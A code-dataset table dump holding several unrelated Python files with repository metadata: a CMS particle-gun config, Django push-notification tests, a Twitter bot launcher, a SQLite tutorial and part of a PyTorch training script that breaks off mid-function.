blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
33f935bea229e032c0010156da4138460aa8b87b | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/Guns/SinglePiPt100Eta1p6_2p8_cfi.py | 7114b9ba046ef43a0d856832cc7b42d9623ef41d | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 618 | py | import FWCore.ParameterSet.Config as cms
# Particle-gun generator fragment: produces single charged pions (PDG id 211)
# at essentially fixed pT ~ 100 GeV inside 1.6 < eta < 2.8, flat in phi.
generator = cms.EDProducer("FlatRandomPtGunProducer",
    PGunParameters = cms.PSet(
        # Very narrow pT window (99.99 - 100.01 GeV) emulates a fixed-pT gun.
        MaxPt = cms.double(100.01),
        MinPt = cms.double(99.99),
        # 211 = pi+; the matching antiparticle (pi-) is added via AddAntiParticle below.
        PartID = cms.vint32(211),
        MaxEta = cms.double(2.8),
        MaxPhi = cms.double(3.14159265359),
        MinEta = cms.double(1.6),
        MinPhi = cms.double(-3.14159265359) ## in radians
    ),
    Verbosity = cms.untracked.int32(0), ## set to 1 (or greater) for printouts
    psethack = cms.string('single pi pt 100'),
    AddAntiParticle = cms.bool(True),
    firstRun = cms.untracked.uint32(1)
)
| [
"andreas.psallidas@cern.ch"
] | andreas.psallidas@cern.ch |
43a001b61a2b88c85128419e2299cf68b0abffef | ad8cc76e8b35aae9756a406859ce637c31c940ac | /bertQA/pytorch_pretrained_bert/__init__.py | 1efc7bb8727c93cc48cbd2111a8835044e61caa7 | [] | no_license | YingZiqiang/CMRC2019-Solution | 6882c1fcee899baf8082b3c7018779fe9d70470a | 713c1a08a2ee595704b921db337e8ccac6cdc9b9 | refs/heads/master | 2023-01-09T20:22:10.284365 | 2019-07-02T14:10:51 | 2019-07-02T14:10:51 | 190,866,541 | 3 | 1 | null | 2022-12-21T14:23:30 | 2019-06-08T08:57:21 | Python | UTF-8 | Python | false | false | 522 | py | __version__ = "0.4.0"
from .tokenization import BertTokenizer, BasicTokenizer, WordpieceTokenizer
from .modeling import (BertConfig, BertModel, BertForPreTraining,
BertForMaskedLM, BertForNextSentencePrediction,
BertForSequenceClassification, BertForMultipleChoice,
BertForTokenClassification, BertForQuestionAnswering)
from .modelingdec import BertForCMRC2019Dec
from .optimization import BertAdam
from .file_utils import PYTORCH_PRETRAINED_BERT_CACHE
| [
"88629850@qq.com"
] | 88629850@qq.com |
a3e2298a9219c9c76fdbe33e87e08bdbcf24fc91 | eddb3c0161a12e612d3070c257610e859e409a8d | /com.leon.ml/logistic/__init__.py | e392d92f72c4440d0906f22ea187026eb4b89f90 | [] | no_license | bazingagain/MLInAction | 942da99cb09200044486a71d7ecbb7285c45af22 | 973df5f3dbc77744ccf4f1b237def4b8ae48f754 | refs/heads/master | 2021-08-31T04:44:05.313045 | 2017-12-20T12:01:35 | 2017-12-20T12:01:35 | 109,850,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31 | py | # Created by leon at 03/12/2017 | [
"1152204424@qq.com"
] | 1152204424@qq.com |
ec9840061a03bfd150d1205cc0924c99f889f02d | 7d4f49bf18b548e40ce0493c9fd4c7c8515ed011 | /api/tests/test_views.py | 66ae3b57711c0eb870e07513bd17b65903538a82 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | mobdim/vialer-middleware | 0730ca5d9edf206141abef46cb7d705c04a39906 | f186b05c05f50a00a61c1f9c8ef8b29591c45eee | refs/heads/master | 2021-08-22T06:00:46.502794 | 2017-06-06T07:43:50 | 2017-06-06T07:43:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,566 | py | from datetime import datetime, timedelta
import time
from unittest import mock
from django.conf import settings
from django.core.cache import cache
from django.test import TestCase, TransactionTestCase
from rest_framework.test import APIClient
from app.models import App, Device, ResponseLog
from .utils import mocked_send_apns_message, mocked_send_fcm_message, ThreadWithReturn
class RegisterDeviceTest(TestCase):
    """API tests for registering and unregistering APNS/Android push devices."""

    def setUp(self):
        super(RegisterDeviceTest, self).setUp()
        self.client = APIClient()
        # One App record per push platform, both with the same bundle id.
        self.ios_app, created = App.objects.get_or_create(platform='apns', app_id='com.voipgrid.vialer')
        self.android_app, created = App.objects.get_or_create(platform='android', app_id='com.voipgrid.vialer')
        # Default registration payload reused (and mutated) by the tests below.
        self.data = {
            'name': 'test device',
            'token': 'a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
            'sip_user_id': '123456789',
            'os_version': '8.3',
            'client_version': '1.0',
            'app': 'com.voipgrid.vialer',
        }
        self.ios_url = '/api/apns-device/'
        self.android_url = '/api/android-device/'

    @mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
    def test_register_apns_device(self, *mocks):
        """
        This tests more than its name suggests. It also tests, unregister, token update, sip_id update etc!
        """
        # New APNS registration.
        response = self.client.post(self.ios_url, self.data)
        self.assertEqual(response.status_code, 201, msg='Wrong status code for create')
        device = Device.objects.get(sip_user_id=self.data['sip_user_id'])
        # Register again.
        response = self.client.post(self.ios_url, self.data)
        self.assertEqual(response.status_code, 200, msg='Wrong status code for update')
        # Register other token
        self.data['token'] = 'b652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6'
        response = self.client.post(self.ios_url, self.data)
        self.assertEqual(response.status_code, 200, msg='Wrong status code for update')
        # Check if change is stored.
        device = Device.objects.get(sip_user_id=self.data['sip_user_id'])
        self.assertEqual(device.name, self.data['name'], msg='Wrong value for name')
        self.assertEqual(device.token, self.data['token'], msg='Wrong value for token')
        self.assertEqual(device.os_version, self.data['os_version'], msg='Wrong value for os_version')
        self.assertEqual(device.client_version, self.data['client_version'], msg='Wrong value for client_version')
        # Check if linked app is correct one!
        self.assertEqual(device.app, self.ios_app, 'Wrong linked app!')
        self.assertEqual(device.app.platform, 'apns', 'Wrong value for platform!')
        self.assertEqual(device.app.app_id, 'com.voipgrid.vialer', 'Wrong value for app_id')
        # Register same token for other sip id (Which means update).
        self.data['sip_user_id'] = '234567890'
        response = self.client.post(self.ios_url, self.data)
        self.assertEqual(response.status_code, 201, msg='Must be a 200 because of updated')
        # Do unregister for changed token.
        response = self.client.delete(self.ios_url, {
            'token': 'b652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
            'sip_user_id': '234567890',
            'app': self.data['app'],
        })
        self.assertEqual(response.status_code, 200, msg='Wrong status code for unregister, expected 200')
        # Check if old token is gone.
        response = self.client.delete(self.ios_url, {
            'token': 'b652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
            'sip_user_id': '234567890',
            'app': self.data['app'],
        })
        self.assertEqual(response.status_code, 404, msg='Wrong status code for unregister, expected 404')

    @mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
    def test_register_android_device(self, *mocks):
        """
        Test if android registration succeeds
        """
        response = self.client.post(self.android_url, self.data)
        self.assertEqual(response.status_code, 201, 'Update sip_id to android account failed!')
        device = Device.objects.get(sip_user_id=self.data['sip_user_id'])
        self.assertEqual(device.name, self.data['name'], msg='Wrong value for name')
        self.assertEqual(device.token, self.data['token'], msg='Wrong value for token')
        self.assertEqual(device.os_version, self.data['os_version'], msg='Wrong value for os_version')
        self.assertEqual(device.client_version, self.data['client_version'], msg='Wrong value for client_version')
        # Check if linked app is correct one!
        self.assertEqual(device.app, self.android_app, 'Wrong linked app!')
        self.assertEqual(device.app.platform, 'android', 'Wrong value for platform!')
        self.assertNotEqual(device.app.platform, 'apns', 'Indeed wrong value for platform!')
        self.assertEqual(device.app.app_id, 'com.voipgrid.vialer', 'Wrong value for app_id')
        # Do unregister for changed token.
        response = self.client.delete(self.android_url, {
            'token': self.data['token'],
            'sip_user_id': self.data['sip_user_id'],
            'app': self.data['app'],
        })
        self.assertEqual(response.status_code, 200, msg='Wrong status code for unregister, expected 200')

    def test_register_unexisting_app(self):
        """
        Test registration of an unexisting app
        """
        self.data['app'] = 'com.myapp.doesnotexists'
        response = self.client.post(self.ios_url, self.data)
        self.assertEqual(response.status_code, 404, msg='Wrong status code for create')
        response = self.client.post(self.android_url, self.data)
        self.assertEqual(response.status_code, 404, msg='Wrong status code for create')

    @mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
    @mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
    def test_switch_sip_ios_to_android(self, *mocks):
        """
        Test the switch a sip_user_id from an ios to an android client.
        """
        response = self.client.post(self.ios_url, self.data)
        self.assertEqual(response.status_code, 201, msg='Wrong status code for create')
        self.data['token'] = 'iosaee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6'
        response = self.client.post(self.android_url, self.data)
        self.assertEqual(response.status_code, 200, msg='Wrong status code for update!')
        self.assertTrue(Device.objects.count() == 1, 'There should be only one updated device!')

    @mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
    @mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
    def test_switch_sip_android_to_ios(self, *mocks):
        """
        Test the switch a sip_user_id from an android to an ios client.
        """
        response = self.client.post(self.android_url, self.data)
        self.assertEqual(response.status_code, 201, msg='Wrong status code for update!')
        self.data['token'] = 'android4bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6'
        response = self.client.post(self.ios_url, self.data)
        self.assertEqual(response.status_code, 200, msg='Wrong status code for create')
        self.assertTrue(Device.objects.count() == 1, 'There should be only one updated device!')
class IOSIncomingCallTest(TransactionTestCase):
    """End-to-end tests for the incoming-call flow against an APNS device.

    Each test simulates Asterisk POSTing to /api/incoming-call/ in a side
    thread while the app's (mocked) push response arrives on
    /api/call-response/ from the main thread.
    """

    def setUp(self):
        super(IOSIncomingCallTest, self).setUp()
        self.client = APIClient()
        # URL's.
        self.response_url = '/api/call-response/'
        self.incoming_url = '/api/incoming-call/'
        self.ios_app, created = App.objects.get_or_create(platform='apns', app_id='com.voipgrid.vialer')

    @mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
    def test_available_incoming_call(self, *mocks):
        """
        Test a call when the device is available (default).
        """
        call_data = {
            'sip_user_id': '123456789',
            'caller_id': 'Test name',
            'phonenumber': '0123456789',
        }
        # Call non existing device
        response = self.client.post(self.incoming_url, call_data)
        self.assertEqual(response.content, b'status=NAK')
        two_weeks_ago = datetime.now() - timedelta(days=14)
        Device.objects.create(
            name='test device',
            token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
            sip_user_id='123456789',
            os_version='8.3',
            client_version='1.0',
            last_seen=two_weeks_ago,
            app=self.ios_app
        )
        call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'
        # Now the device exists, call it again in seperate thread.
        thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
        thread.start()
        # Simulate some wait-time before device responds.
        time.sleep(1.5)
        app_data = {
            'unique_key': call_data['call_id'],
            'message_start_time': time.time(),
        }
        # Send the fake response from device.
        self.client.post(self.response_url, app_data)
        # Wait for the incoming-call to finish.
        response = thread.join()
        # Check if incoming-call got accepted.
        self.assertEqual(response.content, b'status=ACK')
        self.assertEqual(cache.get('attempts'), 2)

    @mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
    def test_not_available_incoming_call(self, *mocks):
        """
        Test a call when device is not available.
        """
        call_data = {
            'sip_user_id': '123456789',
            'caller_id': 'Test name',
            'phonenumber': '0123456789',
        }
        two_weeks_ago = datetime.now() - timedelta(days=14)
        Device.objects.create(
            name='test device',
            token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
            sip_user_id='123456789',
            os_version='8.3',
            client_version='1.0',
            last_seen=two_weeks_ago,
            app=self.ios_app
        )
        call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'
        # Now the device exists, call it again in seperate thread.
        thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
        thread.start()
        # Simulate some wait-time before device responds.
        time.sleep(1.5)
        app_data = {
            'unique_key': call_data['call_id'],
            'message_start_time': time.time(),
            'available': 'False',
        }
        # Send the fake response from device.
        self.client.post(self.response_url, app_data)
        # Wait for the incoming-call to finish.
        response = thread.join()
        # Check if incoming-call got accepted.
        self.assertEqual(response.content, b'status=NAK')
        self.assertEqual(cache.get('attempts'), 2)

    @mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
    def test_too_late_incoming_call(self, *mocks):
        """
        Test a call when device is too late.
        """
        call_data = {
            'sip_user_id': '123456789',
            'caller_id': 'Test name',
            'phonenumber': '0123456789',
        }
        two_weeks_ago = datetime.now() - timedelta(days=14)
        Device.objects.create(
            name='test device',
            token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
            sip_user_id='123456789',
            os_version='8.3',
            client_version='1.0',
            last_seen=two_weeks_ago,
            app=self.ios_app
        )
        call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'
        # Start thread to simulate asteriks waiting for response.
        thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
        thread.start()
        too_late_time = time.time()
        # Wait the wait time + 1 second.
        too_late_wait_time = (settings.APP_PUSH_ROUNDTRIP_WAIT + 1000) / 1000
        # Simulate some too long wait time for device to respond.
        time.sleep(too_late_wait_time)
        app_data = {
            'unique_key': call_data['call_id'],
            'message_start_time': too_late_time,
        }
        # Send the fake response from device which should be too late.
        too_late_response = self.client.post(self.response_url, app_data)
        self.assertEqual(too_late_response.status_code, 404)
        # Wait for the incoming-call to finish.
        response = thread.join()
        # Check if incoming-call resulted in a NAK.
        self.assertEqual(response.content, b'status=NAK')
        self.assertEqual(cache.get('attempts'), 3)

    @mock.patch('app.push.send_apns_message', side_effect=mocked_send_apns_message)
    def test_log_to_db(self, *mocks):
        """
        Test that a successful roundtrip writes a ResponseLog entry.
        """
        call_data = {
            'sip_user_id': '123456789',
            'caller_id': 'Test name',
            'phonenumber': '0123456789',
        }
        two_weeks_ago = datetime.now() - timedelta(days=14)
        Device.objects.create(
            name='test device',
            token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
            sip_user_id='123456789',
            os_version='8.3',
            client_version='1.0',
            last_seen=two_weeks_ago,
            app=self.ios_app
        )
        call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'
        start_time = time.time()
        # Start thread to simulate asteriks waiting for response.
        thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
        thread.start()
        # Simulate some wait time for device to respond.
        time.sleep(1)
        app_data = {
            'unique_key': call_data['call_id'],
            'message_start_time': start_time,
        }
        # Send the fake response from device which should be too late.
        response = self.client.post(self.response_url, app_data)
        self.assertEqual(response.status_code, 202)
        # Wait for the incoming-call to finish.
        response = thread.join()
        # Check if incoming-call resulted in a ACK.
        self.assertEqual(response.content, b'status=ACK')
        # Wait 1 second to be sure the thread that writes to log is finished.
        time.sleep(1)
        # Get the amount of response log entries.
        log_count = ResponseLog.objects.filter(platform=self.ios_app.platform).count()
        # Check if there is a log entry.
        self.assertGreater(log_count, 0)
class AndroidIncomingCallTest(TransactionTestCase):
    """Android (FCM) counterpart of IOSIncomingCallTest: same incoming-call
    roundtrip scenarios, but against an 'android' platform device."""

    def setUp(self):
        super(AndroidIncomingCallTest, self).setUp()
        self.client = APIClient()
        # URL's.
        self.response_url = '/api/call-response/'
        self.incoming_url = '/api/incoming-call/'
        self.android_app, created = App.objects.get_or_create(platform='android', app_id='com.voipgrid.vialer')

    @mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
    def test_available_incoming_call(self, *mocks):
        """
        Test a call when the device is available (default).
        """
        call_data = {
            'sip_user_id': '123456789',
            'caller_id': 'Test name',
            'phonenumber': '0123456789',
        }
        # Call non existing device.
        response = self.client.post(self.incoming_url, call_data)
        self.assertEqual(response.content, b'status=NAK')
        two_weeks_ago = datetime.now() - timedelta(days=14)
        Device.objects.create(
            name='test device',
            token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
            sip_user_id='123456789',
            os_version='8.3',
            client_version='1.0',
            last_seen=two_weeks_ago,
            app=self.android_app,
        )
        call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'
        # Now the device exists, call it again in seperate thread.
        thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
        thread.start()
        # Simulate some wait-time before device responds.
        time.sleep(1.5)
        app_data = {
            'unique_key': call_data['call_id'],
            'message_start_time': time.time(),
        }
        # Send the fake response from device.
        self.client.post(self.response_url, app_data)
        # Wait for the incoming-call to finish.
        response = thread.join()
        # Check if incoming-call got accepted.
        self.assertEqual(response.content, b'status=ACK')
        self.assertEqual(cache.get('attempts'), 2)

    @mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
    def test_not_available_incoming_call(self, *mocks):
        """
        Test a call when device is not available.
        """
        call_data = {
            'sip_user_id': '123456789',
            'caller_id': 'Test name',
            'phonenumber': '0123456789',
        }
        two_weeks_ago = datetime.now() - timedelta(days=14)
        Device.objects.create(
            name='test device',
            token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
            sip_user_id='123456789',
            os_version='8.3',
            client_version='1.0',
            last_seen=two_weeks_ago,
            app=self.android_app,
        )
        call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'
        # Now the device exists, call it again in seperate thread.
        thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
        thread.start()
        # Simulate some wait-time before device responds.
        time.sleep(1.5)
        app_data = {
            'unique_key': call_data['call_id'],
            'message_start_time': time.time(),
            'available': False,
        }
        # Send the fake response from device.
        self.client.post(self.response_url, app_data)
        # Wait for the incoming-call to finish.
        response = thread.join()
        # Check if incoming-call got accepted.
        self.assertEqual(response.content, b'status=NAK')
        self.assertEqual(cache.get('attempts'), 2)

    @mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
    def test_too_late_incoming_call(self, *mocks):
        """
        Test a call when device is too late.
        """
        call_data = {
            'sip_user_id': '123456789',
            'caller_id': 'Test name',
            'phonenumber': '0123456789',
        }
        two_weeks_ago = datetime.now() - timedelta(days=14)
        Device.objects.create(
            name='test device',
            token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
            sip_user_id='123456789',
            os_version='8.3',
            client_version='1.0',
            last_seen=two_weeks_ago,
            app=self.android_app,
        )
        call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'
        # Start thread to simulate asteriks waiting for response.
        thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
        thread.start()
        too_late_time = time.time()
        # Wait the wait time + 1 second.
        too_late_wait_time = (settings.APP_PUSH_ROUNDTRIP_WAIT + 1000) / 1000
        # Simulate some too long wait time for device to respond.
        time.sleep(too_late_wait_time)
        app_data = {
            'unique_key': call_data['call_id'],
            'message_start_time': too_late_time,
        }
        # Send the fake response from device which should be too late.
        too_late_response = self.client.post(self.response_url, app_data)
        self.assertEqual(too_late_response.status_code, 404)
        # Wait for the incoming-call to finish.
        response = thread.join()
        # Check if incoming-call resulted in a NAK.
        self.assertEqual(response.content, b'status=NAK')
        self.assertEqual(cache.get('attempts'), 3)

    @mock.patch('app.push.send_fcm_message', side_effect=mocked_send_fcm_message)
    def test_log_to_db(self, *mocks):
        """
        Test that a successful roundtrip writes a ResponseLog entry.
        """
        call_data = {
            'sip_user_id': '123456789',
            'caller_id': 'Test name',
            'phonenumber': '0123456789',
        }
        two_weeks_ago = datetime.now() - timedelta(days=14)
        Device.objects.create(
            name='test device',
            token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',
            sip_user_id='123456789',
            os_version='8.3',
            client_version='1.0',
            last_seen=two_weeks_ago,
            app=self.android_app,
        )
        call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'
        start_time = time.time()
        # Start thread to simulate asteriks waiting for response.
        thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))
        thread.start()
        # Simulate some wait time for device to respond.
        time.sleep(1)
        app_data = {
            'unique_key': call_data['call_id'],
            'message_start_time': start_time,
        }
        # Send the fake response from device which should be too late.
        response = self.client.post(self.response_url, app_data)
        self.assertEqual(response.status_code, 202)
        # Wait for the incoming-call to finish.
        response = thread.join()
        # Check if incoming-call resulted in a ACK.
        self.assertEqual(response.content, b'status=ACK')
        # Wait 1 second to be sure the thread that writes to log is finished.
        time.sleep(1)
        # Get the amount of response log entries.
        log_count = ResponseLog.objects.filter(platform=self.android_app.platform).count()
        # Check if there is a log entry.
        self.assertGreater(log_count, 0)
| [
"m.vellinga@me.com"
] | m.vellinga@me.com |
efdf39b9dfab765028f936129c07e0ca29c3fd1e | 1c6b25033e27f52ef2723dd743da4cca8807ea7c | /wows_news_twitter.py | df29d80e220c7bc6e3216bd060c4806a91975986 | [
"MIT"
] | permissive | hiraki-uk/wows-news-twitter | 6111bd01616f25481ec379b035a57a03b1eb1a13 | eaca13ed20021b2c79112315d9b10974a6615cbf | refs/heads/master | 2022-12-09T13:16:49.018269 | 2020-02-11T10:49:36 | 2020-02-11T10:49:36 | 213,749,446 | 0 | 0 | MIT | 2022-12-08T03:35:33 | 2019-10-08T20:40:27 | Python | UTF-8 | Python | false | false | 1,002 | py | """
Main python file.
English description is for developers, where Japanese ones will be desplayed to users.
"""
import asyncio
import os
import sys
from pathlib import Path
from dotenv import load_dotenv
from logger import Logger
from tweet_news import Tweet_news
def twitter_setup():
    """Load Twitter API credentials and the database path from the .env file.

    Returns:
        A 5-tuple ``(key, key_secret, token, token_secret, db_path)``; any
        entry is ``None`` when the corresponding variable is not set.
    """
    # Populate os.environ from the local .env file first.
    load_dotenv(dotenv_path='.env')
    # Read each value from the (now populated) environment, in the same
    # order the caller unpacks them.
    names = ('TWITTER_KEY', 'TWITTER_KEY_SECRET',
             'TWITTER_TOKEN', 'TWITTER_TOKEN_SECRET', 'DB_PATH')
    return tuple(os.getenv(name) for name in names)
if __name__ == '__main__':
    # Pull credentials/config from the environment (.env file).
    key, key_s, token, token_s, db_path = twitter_setup()
    twitter_news = Tweet_news(key, key_s, token, token_s, db_path)
    # Run the news-tweeting coroutine until interrupted.
    loop = asyncio.get_event_loop()
    try:
        loop.run_until_complete(
            twitter_news.start()
        )
    except KeyboardInterrupt:
        # loop.run_until_complete(bot.logout())
        pass
    finally:
        # Always release the event loop, even after Ctrl-C.
        loop.close()
| [
"hiraki.uk@gmail.com"
] | hiraki.uk@gmail.com |
91a26161b835aabeba908bf171f25602b115839c | 2e58532464f58b27de68297b0348f0c460448474 | /Assignment_15/cpintor_HW_15/ch17/main.py | 476210dd8cc42923e43bd18f6ed960031540ca99 | [] | no_license | RidaATariq/ITMD_413 | 969a2ebe48746b3269493027daef666bd7a26997 | ee1676419e2a09ce4d52cfca3c3e02f00b24f74f | refs/heads/main | 2023-04-20T19:15:12.864852 | 2021-05-09T18:41:46 | 2021-05-09T18:41:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,346 | py | """
This program demonstrates how to use SQLite3 with Python and how
to work with databases.
Name: Cristian Pintor
"""
import sqlite3

# Open (or create) the example books database used throughout this demo.
connection = sqlite3.connect('books.db')

import pandas as pd

# Show up to 10 columns when DataFrames are displayed.
pd.options.display.max_columns = 10

# Basic SELECTs over the three tables (results are displayed, not stored).
pd.read_sql('SELECT * FROM authors', connection, index_col=['id'])
pd.read_sql('SELECT * FROM titles', connection)
df = pd.read_sql('SELECT * FROM author_ISBN', connection)
df.head()

# Column projection.
pd.read_sql('SELECT first,last FROM authors',
            connection)

# WHERE clauses, including LIKE pattern matching.
pd.read_sql("""SELECT title, edition, copyright
               FROM titles
               WHERE copyright > '2016'""", connection)
pd.read_sql("""SELECT id, first, last
               FROM authors
               WHERE last LIKE 'D%'""",
            connection, index_col=['id'])
pd.read_sql("""SELECT id, first, last
               FROM authors
               WHERE first LIKE '_b%'""",
            connection, index_col=['id'])

# ORDER BY in various forms.
pd.read_sql('SELECT title FROM titles ORDER BY title ASC',
            connection)
pd.read_sql("""SELECT id, first, last
               FROM authors
               ORDER BY last, first""",
            connection, index_col=['id'])
pd.read_sql("""SELECT id, first, last
               FROM authors
               ORDER BY last DESC, first ASC""",
            connection, index_col=['id'])

# Combining WHERE and ORDER BY.
pd.read_sql("""SELECT isbn, title, edition, copyright
               FROM titles
               WHERE title LIKE '%How to Program'
               ORDER BY title""", connection)

# INNER JOIN across authors and author_ISBN.
pd.read_sql("""SELECT first, last, isbn
               FROM authors
               INNER JOIN author_ISBN
               ON authors.id = author_ISBN.id
               ORDER BY last, first""", connection).head()

# Data modification through a cursor: INSERT, UPDATE, DELETE.
cursor = connection.cursor()
cursor = cursor.execute("""INSERT INTO authors (first, last)
                           VALUES ('Sue', 'Red')""")
pd.read_sql('SELECT id, first, last FROM authors',
            connection, index_col=['id'])
cursor = cursor.execute("""UPDATE authors SET last='Black'
                           WHERE last='Red' AND first='Sue'""")
pd.read_sql('SELECT id, first, last FROM authors',
            connection, index_col=['id'])
cursor = cursor.execute('DELETE FROM authors WHERE id=6')
pd.read_sql('SELECT id, first, last FROM authors',
            connection, index_col=['id'])
"cpintor@hawk.iit.edu"
] | cpintor@hawk.iit.edu |
65fe900208e9fc51b37c1eafd31420a6a244b913 | fa2bcfe157fec22e0771059eac4205c1ecc67dfd | /train.py | c7ae2a3ea5cb1612b4064da0a582b93bb0c35957 | [] | no_license | A-Nuru/Udacity | a539de107e82c3bce4ab55cc09e131774ccd093a | 4bc7184196f01ea190c754237198da3bb371bd6c | refs/heads/master | 2020-04-21T10:23:02.425695 | 2019-04-17T07:39:26 | 2019-04-17T07:39:26 | 169,484,525 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,404 | py |
# Imports here
#%matplotlib inline
#%config InlineBackend.figure_format = 'retina'
import matplotlib.pyplot as plt
import numpy as np
import torch
from torch import nn
from torchvision import datasets, transforms, models
from torch import optim
import torch.nn.functional as F
from PIL import Image
from torch.autograd import Variable
import argparse
import seaborn as sns
import json
from collections import OrderedDict
def process_data(data_dir):
    """Build train/valid/test dataloaders for the flower image dataset.

    Args:
        data_dir: root directory containing 'train', 'valid' and 'test'
            subdirectories laid out for torchvision's ImageFolder.

    Returns:
        (train_loader, valid_loader, test_loader,
         train_dataset, valid_dataset, test_dataset)
    """
    # Bug fix: the original body reassigned ``data_dir = 'flowers'`` here,
    # silently ignoring the caller-supplied directory (e.g. the CLI argument).
    train_dir = data_dir + '/train'
    valid_dir = data_dir + '/valid'
    test_dir = data_dir + '/test'

    # Training data gets augmentation (random crop/rotation/flip); validation
    # and test data get the same deterministic resize + center crop.
    data_transforms_train = transforms.Compose([
        transforms.RandomResizedCrop(224),
        transforms.RandomRotation(30),
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
    data_transforms_eval = transforms.Compose([
        transforms.Resize(256),
        transforms.CenterCrop(224),
        transforms.ToTensor(),
        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])

    # Load the datasets with ImageFolder.
    image_datasets_train = datasets.ImageFolder(train_dir, transform=data_transforms_train)
    image_datasets_valid = datasets.ImageFolder(valid_dir, transform=data_transforms_eval)
    image_datasets_test = datasets.ImageFolder(test_dir, transform=data_transforms_eval)

    # Wrap each dataset in a shuffling DataLoader.
    dataloaders_train = torch.utils.data.DataLoader(image_datasets_train, batch_size=32, shuffle=True)
    dataloaders_valid = torch.utils.data.DataLoader(image_datasets_valid, batch_size=32, shuffle=True)
    dataloaders_test = torch.utils.data.DataLoader(image_datasets_test, batch_size=32, shuffle=True)

    return dataloaders_train, dataloaders_valid, dataloaders_test, image_datasets_train, image_datasets_valid, image_datasets_test
# Load pretrained_network
def pretrained_model(arch):
    """Return a torchvision model pre-trained on ImageNet.

    Args:
        arch: one of 'vgg16', 'resnet18' or 'alexnet'.

    Returns:
        The requested pre-trained model.

    Raises:
        ValueError: if ``arch`` is not one of the supported names.
    """
    if arch == "vgg16":
        model = models.vgg16(pretrained=True)
        print('Using vgg16')
    elif arch == "resnet18":
        # Bug fix: this branch previously loaded squeezenet1_0 (and printed
        # 'Using squeezenet1_0') instead of the requested resnet18.
        model = models.resnet18(pretrained=True)
        print('Using resnet18')
    elif arch == "alexnet":
        model = models.alexnet(pretrained=True)
        print("Using alexnet")
    else:
        # Previously an unknown arch crashed with UnboundLocalError on the
